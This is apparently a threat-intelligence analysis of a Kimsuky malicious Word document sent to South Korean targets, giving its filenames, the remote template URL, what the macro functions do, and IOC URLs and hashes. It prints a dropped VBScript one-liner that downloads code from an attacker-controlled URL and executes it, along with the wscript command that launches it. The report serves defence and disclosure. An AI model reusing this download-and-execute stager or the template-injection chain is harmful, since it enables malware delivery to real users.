kimsuky

Malicious Document Analysis By Kimsuky

Introduction

The content introduced in this article is a malicious DOCX document. The malicious document was distributed through email. The target of the attack was South Korea. The analysis believes that the is likely to be the Kimsuky Group.

After the malicious DOCX runs, the URL embedded in the XML inside the document is accessed through the “external link address” to download other template files. The VBA macro in the malicious template will download the next stage of Payload execution.

clip_image001

Analysis

DOCX Filename:

업무보고.docx
Business report.docx

DOCX Title:

바이든 미행정부 대북전략과 한반도의 진로
Biden’s US Administration’s Strategy toward North Korea and the Path of the Korean Peninsula

External address:

http://koreacit.co.kr/skin/new/basic/update/temp? q = 6

Word has a protection function, and the text of the document is set to hide, so the content of the document cannot be viewed.

kimsuky docx

DOCX internal \word\_rels\ contains the following settings.xml.rels files, which are used to download and load other malicious macro documents externally.

kimsuky settings.xml.rels

The string in the VBA macro code of the template file is obfuscated, and when the macro code is executed, malicious xml (actually a vbs script) will be created and executed in the folder where the user template is located.

  • The ViewPage function is used to delete inductive pictures in DOCX and display the text of the document content.
  • The MainPage function is used to release the vbs script, download and execute the next stage vbs from the remote server.
  • The password 1qaz2wsx is used in the AutoOpen function to unprotect DOCX.
kimsuky vba

Command

wscript.exe //e:vbscript //b C:\Users\[USERNAME]\AppData\Roaming\Microsoft\Templates\1589989024.xml

1589989024.xml

On Error Resume Next:Set mx = CreateObject("MSXML2.ServerXMLHTTP.6.0"):mx.open "GET", "http://koreacit.co.kr/skin/new/basic/update/list.php?query=1", False:mx.Send:Execute(mx.responseText)

IOCs

http://www.inonix.co.kr/kor/board/widgets/mcontent/skins/tmp?q=6
http://heritage2020.cafe24.com/skin/board/gallery/log/list.php?query=1
http://koreacit.co.kr/skin/new/basic/update/temp?q=6
http://koreacit.co.kr/skin/new/basic/update/list.php?query=1
https://reform-ouen.com/wp-includes/css/dist/nux/dotm/dwn.php?id=0119
http://www.anpcb.co.kr/plugin/sns/facebook/src/update/normal.dotm?q=6

1670bb091dba017606ea5e763072d45f
21b72a6ed58db07a7f7c16372c3422e2
41aba3f7a154fb209beba0e36e6ef3ab
68a1cc84de7d5802b7251786a8a5da0c
a9b6cf8d8d0a67da4eea269dab16fe99
c563e10a3cb496f34d704d1bb7b22f17
c67fd64f6cf1aeec3c3ad81e34aee1e8
346e9992cfbb04fc5f4f040174545a8eead80a61
3af17cb46f2542e002855f9f90eb708e437cc896
3f7f6cd8f8f72b729dadc7d7fab2a5bd774c8700
435779d4e679164bfdd31b4bafb3aa412fd0e3a4
58a1a7d3ad3c9acd1a532ec1417ea7547f5c6d96
5e932b369d975a857080984a5507cbd5c6add9db
9b6d96909a1ee359ec9b15e0e217fcf07a5d1ee0
39bd6b689b02d6dee329131a51aa09301889faf5698eeac0d02aef0ba47cf024
50d826640cc9ba66b789f0823f04308178b435f7eb39021bf7861061849f7efd
9032da9c3dadf190e3970acf838675a83b4cc65c1872c78325a1abced5162a35
a1c2e7f7e123a1a463dc37b14d62c69efc709a02d480cdf3654000d196050da9
a8820cc75cd580c8eda747931eb36f5943cece48ba720af9771cf16490a78aa6
e46887db62f3ee5583587531358e1b70cc8a171067fa4e1ae3e6693f7f9fc938
115b9bf1c6f6040248dfa1a77044143dc318e3712ad613a022b4cced6007906f